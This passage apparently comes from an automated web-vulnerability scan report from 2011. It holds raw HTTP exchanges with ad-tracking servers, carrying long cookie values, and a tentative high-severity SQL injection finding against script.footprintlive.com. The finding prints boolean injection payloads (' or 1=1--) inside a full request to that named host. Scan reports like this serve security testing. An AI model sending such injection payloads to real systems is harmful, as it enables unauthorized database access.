P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:18 GMT; Path=/
Set-Cookie: pf=zNY_iQmPYa_zclA7g1v0xJycYSF0qEoRj_yAFOA4SG5pZRM3I2Ow27XFAiLSy6gtZDpM35cC-2bkiEEmtUQheN5B5Bu9BqMBtjj7wP__NClHw7bLxoA5_jGg94DVp3tlq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdcMaLOL4cJUfMXqa69SSN-06j536gTCcrB8YkBaxDNOYv0spABEy5U_6uYzsaV0qHQy9M-nlqe5xLK0APWVwpFX-_R4ZkxZQ92TvfhRJZWCKsQ-tcOZ2wgA7MRrLH9BDXSkGVYGnSrzAmAhYFK42FCqJ_bp4SQNvkxFNi9IqhDA1c4FCwip4hawpujD7cxMW91JQLloe71uUN_fZGNhLxDRcxm6HVkCDO3jWerY1EJJckUwRn11mDb8lLoWDWOsi7xA5skONMrsqXGo9p_vQs-t8YtMxk53J1X-JEGSNIkxwfWnknNBbhXoz-w093w6uPnrCrV8PM9h2q-bSke-3jj0Ox2DYFU6iqxk5L-aQl1-5uTvAOxSB4mxo-Q6YMhB3VRGEabSKFXWzzMFpGtePKWG6DI-3yIiz3klMj1NWsklmmJwxaXYX8FFp7QAiI8nhwY1wWZ88KpsxHeP2XzXjFK_d-kGppF9S1RgFdt4GxBL--0Hm7pxAE9wMk_nQukZkyBKQSQ1lCnTGDkELZF5yaD5hov27V-adyHqGdS8YvpzfU9SPbCBiT580Iy8irYv9iLBuqwH5rpaIoYyVJTY1OsHZhoKS-Wug910AyWOuinjbr_0z5zf699wFMrWmMcclxzKaAaCNEmLp68Zqq2-LWceDpHaHyI0WpGDwhgIzAtbsX2XsnLt_LbqkSFnImQEfYXMgXlc0VMb90O2rAmT1rycecRmU6rUbNsVDYkn5QLEhbFvkLTc7EK3c3cK3KAt7ZIWB0eYrt6rJ0EoQmsnjCl24yTT_skx4PxMC_6f5JWuwDBmE7vZLIZ9H7tPC0iivWeeN1mguVa38qqmJaz4uUbEOjFEcGULe2ZUh9flwtxT5cGt8FXbRwX1lPbREIX5I_D
2yDEgqdLPaeOqMB3phwSOODNlE2lYGr6y0_5J6Hwt_33Lph88Xs-KFXy5W4ivRl_vERszhIysFDRbRBMN3GpvQXHBGqyKUPQThxpOTF1mBnvVPMo6zKgQkjOLsgQfETK5o1Cbsw0Gt8itAK0AFg_BStc7g19L1MTTYv7Hn3oU47PhJPD-mcEisqb13qOvvht_-DVFreVT3zwVb5sJMvIhgejHovgqOT4uj1NncwfIJ0b-RQ3NwrbcUpT2qMXfWSYPxsQgJzG8QzzBt2lV0ge-NeNGb7yjFoK7QuEglqvP9t_vj8eiDnuN0jxaGTEGN4XvI4UrkhsaVUzG7tgYqtXFe8gCjp1FSMzciKpjqLF8rRjHKKyMf3iBzsNJjRLBICfc701uFK16Z8GTUfnagGPaQBmalZ8DIFLMY_ydFO68F9tdI0k-RTl2po5thPnqgz676hey8Q2Glpyu8gs4ySxBbBf9YF0LqeFNmeoiGiHHjGx8yXVuM2hVoYu9RFDnkolfklaPDEFPrf7yuoGjMotqgQPH2igEPEnLjoTMRIBBCPsgjxFuig1iQVVamfEXRPhkIqxbdXxDjRac6Jn1NtVypQBb--Nl12SEYRTSy-QWGl2-87tUUsKuOK8UUbzsrGrf4xc8703QPmY5Dc-7AceWI2QVtBIXRFf08GSMQ1Fu9K93u6Sdfk0fhdbCOiP_aIBBNYnh10h0_GCfVfV7jzJ7OCFCMhy9sZnxEnVsVLETqvFHIcoEqvx3b9PCYMBFot5aXFqJP3F9gm-dE95yUro_-iGBdYbB2xNnDHxyNpokqhxj2kjyUz5gRLkFy__Jjupt8XMNFK_DaHC8hmek7OwZdyIaOQc0I03dJ5hiw9OKqF9-hehgRs004u63INB7FFs-jw20xu54KxqkEY5K8kuTfBmnnmeXqBpFquNfU-r9a2kMiraETMoCsAiiEBbFGv5AEhYoGcQQd6_zkCcjdkXZtRmQ0WYVs8ua9c5OzhGc0IaKVSTGNqGUOXU6B47mx_6WRty3OVB6IGrE_SdvvDYQ0mHy7wHT5CMKPLaFbXGxIwM0yvOhpHHPMeQNoL_8tmA93plKQFnesG7C9l90QrSAfqu2QuVGxD4G1A88MfbLVaEDY-iI4NqLNfUeCf9PUIpxQXcXWeLifFseolSx77MXyFHnoq61yK4lL6wW3kXrpnZ_g0AAeIdqZR3FtK7_PE; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:18 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Thu, 16 Jun 2011 12:18:17 GMT

Request 2

GET /r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=undefined;ord=5328984577208.758?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QM70Whve3yMvxkhKlZSDFc8jBjr9GZaXPVHd3KPTbrVh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCacAfwlpOGZwMiTYKzkLyV6yLZO8TKZa-nLTQQ4a65pbCg5Ip47iYWcr2TLdwTDr0L4oBBpiyP3J8NU50OkfeFof5nfT0WqmMXNTAO47jNWqP9DMJbnJ4jgxRBVKYcWOOoBo1vu2lsqV8DN9Vps5BPlmPLL60Ne9Ei9t17XStRc4rGERgBg46FC_PZzOaKvw_-cZloB2cEevUSjzsvfqJ8qZhgZ9g0kmeR-0KBwkm_b3-nHDVWO4oEVu9LZTNJAoERvvIJejvF6b257maU3ML6OZFn0pS1M8s2KPrvUfPPF0_ewHYGlNdqDaG9FYWPprE_WjI_lsRoaOz7-O-vgmKJiTz-KIh4eZr0ecbMlDpVZu91zdW0hE-4eLwR7bomsP7JSdqWSoz4sC-t192PZJ_v5Q-P1VlQMzPKKE64Al6GE9_qQBVWHaPX-roIWbRumWL1-XpDwD22ZRNSBnUmAd0wjxC8t8bNFJSd1YiPEk8t_65cnD2Yeg02hxYDcV4Js2beeQ5R5-3xXfzzH2krAPRf428tdb3ea_CHM6GXs7htoYXSpzxUEP4Lawlcjwmuu0sgABXItk3mefJp5QRHv4O0nQLT7vqCmjKMUnpRJ6SJsSELsnefots81rrNB8RkZzwt9xgKqCmjZaalMlFzn1gedMiR83opqf2DdmsWkwVThPxhyYcbbPOXHwjOkupykmG8XHU2Z_bwsvqeY5PpknKks9Ka5pRG06H0tQ1iybpB3pDqsDA387b4GyTrdtR0OxRq1W2-clEv_ue7qpjwh19AlSzwxLx1pBhUX4CYwoSQucKtJqb949HbLP0at-l-Te-c7NLS367-cid5bH8-bJWmY8nC9B9w1ij88w7eqsM7UhZeuq4rrlofmxpvpW8sH43ef-7J7zFZpaqjQcGC_vq5exjB6sqt4Mo-GvkAj2qErRL9pWBI8bQOJli1okJuMhLcQljneDOkY9olIfd-ve5Qn4-P1VlQMzPKKE64Al6GE9_6W9aRH84b2cB20BvmgB1t-XpDwD22ZRNSBnUmAd0wjyOWY3k4-itBWJe_k62xWOCrFV4LhRdbHCAEu2Xc3dVj-Q5R5-3xXfzzH2krAPRf418WpxTiSnvzOJ-ZkQfvNQASpzxUEP4Lawlcjwmuu0sgAGs1MSewshLM0Q6GhK5Ns8fU1J7JmYpzzzNP9hB_wUy05oRsNhTbhcD1_xCDQojfMSuZLsISBijKSjMDSgLlyDjsNAVa5Ct7DxoA1avkLsQ815KVjL9JqXyOpgagVKRMbntt6vzlmgFJ9k1Zzq45WeFCQUiSJFaYOp4MQlbe-RFUEK9KsJrC9CLkGJUacP7jEa1wTMgEYoXiZA8_W3FI42qThwrh-6wCu7vlgqZNOXixmWgHZwR69RKPOy9-onypkTIcQzOQc65c9KVO3IQPv8Yd11jfaAGeomVXk2jyqz756mNhe7mBUb-nxi7SHg4OCY4fQNDPmLA1QCvKDvVxcR7AdgaU12oNob0VhY-msT9lb_ydeK6sfV-VwC1t6PXZrSU8zXCbuEO-Hn-xUU7T4MdZMXr1rBrtZHchRIeH_p0MQswiaZbyLrfvl0j4wXxTj4_VWVAzM8ooTrgCXoYT3_ukoy-I69c7SrUTlHbB6rZ5ekPAPbZlE1IGdSYB3TCPPtQxe5L3Tuc-yk0WOEmJZ9iOsnV5UjcUOjnXUSJzJan5DlHn7fFd_PMfaSsA9F_jfnYBNZ11ca-Wgmkknbh9eNKnPFQQ_gtrCVyPCa67SyA_xeh6xaAKc9mefeGrL2bordkSY3wrTx66nlJUXJL2YzTmhGw2FNuFwPX_EINCiN8l08PBB5hX0JN8MvjDOsPSeOw0BVrkK3sPGgDVq-QuxAsFTUl8EdeBakl_JEHs
yGF2Jfo-RxTjyjBkOV794zNZ0kTA-aymPAds4qYFrApgUvcPT0oUz-YZYVaDcHqgl-9xmWgHZwR69RKPOy9-onypimfvYrBKXvtznWuT43S50y-3u16r0dKm_zz3ndHe3WlG-QgtH60dqlqdrI16uF-EVNzoshUKoWhiHnNcI8oP4V7AdgaU12oNob0VhY-msT9kNb2AdwFV5i2vxwzlIKJ3BfY904hG-_CHlEd9j-vzfzk5Jifrc9V1OOzEX32QifKI3TThUmivC2QQLLhMmAROj4_VWVAzM8ooTrgCXoYT3-ZdIfAS6iVxgYyOedo9Ki95ekPAPbZlE1IGdSYB3TCPEX3xTtUTn7ghX1OdIngM2q-RWnunI4BlM040X2RcB965DlHn7fFd_PMfaSsA9F_jUBCGuQvL_fhodmVMnOIMvBKnPFQQ_gtrCVyPCa67SyAw4hmx2eXEqzbsKwy_MNlFfUa0Y_5ftklciMdgbQhb_wbdYORBXyNJvBU7ewnBysYP_zg1-oPoaJCGGP6Vt55Gz_84NfqD6GiQhhj-lbeeRs__ODX6g-hokIYY_pW3nkbP_zg1-oPoaJCGGP6Vt55G1OKf083dm4Ocqz5E2RJpVu9TfQkOcNz7DOIIZP_23WvvU30JDnDc-wziCGT_9t1r71N9CQ5w3PsM4ghk__bda_nUnHYqNkC6RPs4-2B8pJoMqCuwkKr26TEWeaS686ExCPxJGFKBs6DSrH4oyWVjhIBdxGEbgsgCDz8r26d8pRZAXcRhG4LIAg8_K9unfKUWejxkXIMl02q9l3ycv51k_QH1ePXpCkOqUdD3FJ26E0LEgnOhSnZw4WOirtIvKWwJRIJzoUp2cOFjoq7SLylsCUSCc6FKdnDhY6Ku0i8pbAlEgnOhSnZw4WOirtIvKWwJTJGg5u5RuPReUxP5byb5LGsjsJdNDz0zBLNR8ReLDcirI7CXTQ89MwSzUfEXiw3Iv5E8JDY11x5xog0GskBswr-RPCQ2NdcecaINBrJAbMK_kTwkNjXXHnGiDQayQGzCjVgVkoy7DysIPcuC3AUG0sb1BDdWaxOURi_bqX1S5T5G9QQ3VmsTlEYv26l9UuU-W___E3ohWz6drp_rI2j18pjDJAj7Gbh3rF9uN2-5_zdRHqYmtLfdK6unD4Xv15XLH0evbFMdkuI2WqEUI01UYXDJU38vLMvNPfD69rioBNl6-78JM-YwVK9vMhQzP5aE-vu_CTPmMFSvbzIUMz-WhPr7vwkz5jBUr28yFDM_loT6-78JM-YwVK9vMhQzP5aE-UaEwuQGXrKf1B0pg93pQC8wfsfoRTDgpAqCg9KVA9UvMH7H6EUw4KQKgoPSlQPVLzB-x-hFMOCkCoKD0pUD1S8wfsfoRTDgpAqCg9KVA9U-Nxmcu6N80G4H7yE1a6GL_jcZnLujfNBuB-8hNWuhi8zo63SsMKXllQ8R3TROrVZwRV4qFgI_yJZybaj30x3rZThUGsgezmPZdo0hiRJAEU2UlTEERLOiMahUz0Je5vrQpUNsf8ubz28dE3HpFhXM4HLQRF00hhIXSJp9kwMyEKBy0ERdNIYSF0iafZMDMhCgctBEXTSGEhdImn2TAzIQou93XF3r4cgLiZIl0wssIM; fc=c8voyByxtfmxf-PR5HgfpjgORIc3Od-xFb-8M8t9VWkz6wrQqI-cCCIP4q7JSoro0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnLP_4lD6MCBjT4SRxTIxlhNKLFBAG3Fk9H3_mDAMZFkDVnBVtdUIoJ-JIgllkJFaAJbHZLznezJA10wgg7oc-ufuxx6wPWxSLH-VTpbekwI2; 
pf=bskS8Lli70BjXEzd5NYfF8V9tHnIhHPKzn-ZptMbz3NTv4g2_4PHk6pD33NmTL25iyDxX-e5nvqK08ftGFlNZcB-blYU8Y2b3uGZySbN9k4boogWXDFyI4_-RvN_buohq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdbR_ukiIJxkBku1CxquV17mPFnSRDfouZL6wYhXooxR9ULrxpvguFI2ofDAIOd3EuO9yXy3nBEXqSScPA5E39O2_zg7l3tDIiyF94B5aERskWHv8BOnUkNaZrdPIQNGZqdwsP9I0MRtXw8xQWWbNPUyQsdjE_Scn2QYUNUmcT7rDH85LuW-sDtP4uwhJo9atGrEPrXDmdsIAOzEayx_QQ10pBlWBp0q8wJgIWBSuNhQqif26eEkDb5MRTYvSKoQwNXOBQsIqeIWsKbow-3MTFvdSUC5aHu9blDf32RjYS8Q0XMZuh1ZAgzt41nq2NRCSX590hwfiGo-qcVT2kvWmzeR7b1paN0zLvFemp5AQnABOzIFk-pYt5rgVKJ87aXtgPb-mafaJ5_5dz5FYF2gdO3-RhTnUyFltTQjNRcqU7m_5Dsdg2BVOoqsZOS_mkJdfuPEzm6ziEo1_QjXTUZsQGb3aBmo_VB_3afAvA7HmJ70VD1x9GqiaHujprGHOBA7aEDie69XnZ9g3UdQ8qboT72h45foF_fR8Dfspr5EIo6mININ0MwGURZOI6NOy-sr20mDmWfrauITMqFQqh085LSKQUL7YGM0pJp1-FIztq58QhVWy6LSDOwot2ckvPUzkd-FnxN8NhVB8sqANsWORR78w7iqAGDudyRR4sGrjr4yCu4BPZ9sxxEAJuqkU9WhgK5HyS-jWx86QRjwbOSlxW_AShejO2Api9OqW7wGthrtivajOoHMt7EKDIqFqYM0LalgBhHGk98NLPXedpy1UU1G0p61bv1d1Qe8RvD9O3tReDwxPBbZMzCCP1zNubGNg83l1aV51TfDhTgj1yUZOWuS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtd7vTs-bMZZ3cr3
6hzZbdHwcgMjIQ67GgiGFnif7dZxa3qqTs_pw5jFRYMsjf2CDWROI6mFHsv9rileAh5u94Tal8X9jZGPmZVvtACyANcU61_2D_gjytCfJX5eIYzCUnD9N0uTPecPGlXnt0zeFF6nGhy-4kHkvuGu7mFLrHknQIOqyVa7C5Vcz2ztFo648TLIYncavW2EU0-FxAowg7Q_J3_JUWPrldWd5VL7X-3ELxQm3QGLlDe9QHA7dTmmKmFxV0767zf8vh0-XU0u6MJx4viNkNYwNHgm3A-Zsn_tb2nFJRjBcEMxdDM5u496FsXzZoCQNrRn4Nka-1SbHAlq1j0766BFlUYsZHI9nvDUSjNUKoFWTkAUa-o1j-LL1ebdsaBpOZQwog1WHvup_q5MU0eWf_8Tnz19zggAp1l0o0E-qtSYNUJ36V_bsysgOo8ovHlz0rw4urFgweCpjhoovSxZ6xAsLQbFPBlhboS688EaXiGds-5scOf0AWtR0WtyJH-06RSCV4rzVRndoxKQ6xvTNWKSQfuYds5-6wqXTrrprCUxSH31llwL8axfVJ0d6h2Ke1Lez9-eYMqCkG4uUOXcVRZwxg85KAU3HRwHZ-EWY6qIaKdc8DaRYJXxJzEtphWqdWwTUQc6r3kmRMNC1ofRqXiWAg7U15-Vq8fXUTyQ-Foh2RKGC89bCSZhuIo0DelrjnD_y1FdMAK6632Po5svz9Xs-GXO_PYmIh52EUXzRY-jfWrhp-btGaCKGToFYaTe9bd1jKXwduyoimxxjrfcWCeJq1txaaBU_3Uczg1vUpNInXslg4NWbOv3i1AMVsxWmxcjn77s3i60QHhTEr6gILrU4PmsHL3FqzwzpkTuJbzWi_g5eyZHwtMfpYoYwULodolIu7euVx1T6-kom1lfGeK534YvRLg1f6xfa7TbJat7GFUh5YcwiKTv6i2BObi71nwu2712ua_zaapTMdVqI2HeT5VUjRYlLwTM6Q4btGEdG0d_jWUX-DJJ6s4pWL_6FerjeM6JRh-LuLiaWTXIluKkF9otMRxuQA1xZO-l_PyGdq8ZIdQBo46D090aTaKlV1enoq-_ZVUdLnFjEj8JuvB_NmaEIhlkkUtL2E3UODDMR1tOQu8PjS8RbchSrxsTjxxMOUEsUJ_Z756RnNmhOA_TD07hZfxuz8bhfLCVULYz6Ok1J2_QA_kXIY92iqRVh1b6IbTDyOALqZNl5K11KDpAXL1nqDbSN94B3fAGfWH1075KVzt7-y7v8wzj5HvH-kwIHXGh1rq2Sy1u7pxUuundR497HrST_MMHxNG2Kdut19FcHWUqjUfID5JAiaS2fFEZWuWIqjpSvJM2ivPIAO7c_zUdwbkiWS8ejzieFqJCa8rSsS_dWSQq-Icz8Io9aHLgwbQxkFBxTOEAWmKRZWPfJkX_p8vFnb1Nu9kYvRadgXAM7qphVq6O0Tj; uid=4325897289836481830; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18%00''; rds=15138%7C15138%7C15138%7C15141%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:19 GMT; Path=/
Set-Cookie: pf=QkXlLsXeCof1FxNQlI490eQPsAJdXZ7IIbiMDv2SRfISHVK1_OEyMmAGdBklK9v3ZDpM35cC-2bkiEEmtUQheAr1JHtLNIcOUiq7qjRhLlMTVtX1JClFcyiqN-UpZ4B0q-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdjvdQWoWzqMK0drdqRnQSu6m5tCSgQ9okTgBLIfp7onLJE-aClvF86XEG4y2j7Z9gl2gRWhWGYpvLAxA12w9cxiIBMhK7XJNw8X8COJW_RkR5xzwvpeRqXCzd5zwVq62EgBkS8lgn_0fR46CiaxQScz8BZJ8Rv4Ff_c_3rVtIIN1i8UiQErusP9NO6AxTgL1R9GXJNBLuxCil8OstE6UbErLgYgxKhpXLkzUs0B5wU7rwVFIBOqPN9C41MRxI4I-PwInFmX86VXogn3Ug5S4btYU88gy6fFTI6k9Lc8oTkR9RS7ahaBzeY1ExInPPa3blfamT46xg16p8euZB7eQVYAYzkTdgBz17_7yGtSkNiNXMKv0kCNhz14WyHRtxKPKNUmeBsP0aUt5oVR5-YC2c6uVqXA-UUQOby0yN7jLB8i9RCiSB7bxZBuw62UiWlH6qTlxKtZwu9mxvrwly1rFPraqBXpiSWkWNdhqOFdseOHzBTROtWl0b2NPVbRqMwYE7vgyZkcPju4h8dXOW1YRC2EkY5ktqOpws9vn-tQw4C9Pgk-8b4vO-EtKQS29EqGyEiqFrgLQbs_KMqw9Ai-wuJeb7tZjoq9Xjfe3S_MQGeuaOxOHVqZ8CtpOZEmf9cbQcXEI1IP3ZiGEPDKW14z9lqNo1zaL7mkGUUbcQzcLotTkzELHTm4CrVNO4IAE_bQoQrda6uWlMmwtlOmB1DPe7MSsesve6vuBgJLL6nasaSg93C1yz0D1afpPwNJe8kc4d6aqIyN7aM5G7iGJ5cooWxIImd9eLNEhcTp44Fl4MpWiQRgQcEsfe_QTcoVdsmoM46IOvwY43JxSSaogx2WI4Y4D0gqZRjgSblBAjI68x3cxQNGLeMpAZnlJZ-L3SmNbMj
jmVHmkk_-kBlcty4HjY0H8u2t1hYZ87GZZjAmAFUlPIYU1tRmSXIcPfF4hLwBMnow5jP1zELEB-J2bHbTxZs1kRBAdDG2iEqya0fjCizViwf-BtUiBJARqMsv8pcBsagQiB-_G71hkEaDNGB691oA7n83t3xebtv1vUtV_fo27xBQgJwN0WaX0mAgtftdzasdfADbPQNbNcAmotsl3_lC2-CuVZ-X3zQqoA0L5GtrYiJscC5D1RWZ-iLd5VKH_H9V0z_3argECBQ297KevASH91dt11YTrSl4jAu3uAHR6nR7n6Rwh9KKtB4kiNg2voFVVORwg9ZptXnoETA-nrIkjKXGdCoMkpFadMDbhgpnb3ORwAzqg0PMCO0pghekwgFPR3-U6O-iJqIUmx-ooGGwVlHB6kV0IwZiDGfrUYrbIxvdYLbjC1jLLmfgWCrh3gqGuW2wITqqg7s5AGH77norxafsfNsoi-DwCrG0K3NTHuXAEAA1Ktng_3xPtcUTuSsdEtY7ZYFcBZQ1y0ATyghVuv1cV2KYeJr1SeyM5ad7NmqRByD7y2n1mCnxxKsb6sl5tNicgYNpqsIQwFe_U9bui7Dnq02l9N_Z6ViZKOStEBirr4CXMtiDW4w_7vxGu6c5qcSmjNKRjbC_dGLUSdMdlhb5rkWmgnWmzhuRo0HuNYR_YY3DEEM_i2LorcaiS_xOEQbfF9mepjhhg-xn7UisdgkcOoh4w6twOxuVwhuhnkK5TWoOhRHy1HahEz4hD9wLj0XDnJrRPsXnPzDtO5YIbO_0H81Av_WEOXlw64dEJToedCjM_rJANTA7mEJzrlb0o8QEr2QX7q5s9ON8--wpoqZq8b18bKoFV6hCVVjUAvcRCz0U9ob0r6FT3E9YlM4BnIUh7fNXzlGrmulWgzBQtu1DAQgPxgss4TuKAMASVtRlrHly51JHNPp0y2NJa0BEaiAuNZITLmSKFF3F9WLiFQcukpu7C7xWzK2jiRfNiORt5kNklylYixSq3CxlJ_gsmqmV5Rcfx0bJXukxAJj28jwWsqqfo1eCQbvjAUdRPl2z9iU_1tUwpXsHYGz-QeAAgsQUjlwrgOoYfmTrtuwVfmAPUqu3TpVjSd22qkYznqS7vknwhCjycawFpJqNxCaSa-USwNSLxdAY8rCpibKJTw3EBpcO1UY56GbWKx3Zg; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:19 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Thu, 16 Jun 2011 12:18:18 GMT


1.14. http://script.footprintlive.com/ [site parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://script.footprintlive.com
Path:   /

Issue detail

The site parameter appears to be vulnerable to SQL injection attacks. The payloads 18703088'%20or%201%3d1--%20 and 18703088'%20or%201%3d2--%20 were each submitted in the site parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?site=nicusa.com18703088'%20or%201%3d1--%20 HTTP/1.1
Host: script.footprintlive.com
Proxy-Connection: keep-alive
Referer: http://www.egov.com/Pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/javascript;charset=UTF-8
Date: Thu, 16 Jun 2011 11:16:09 GMT
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
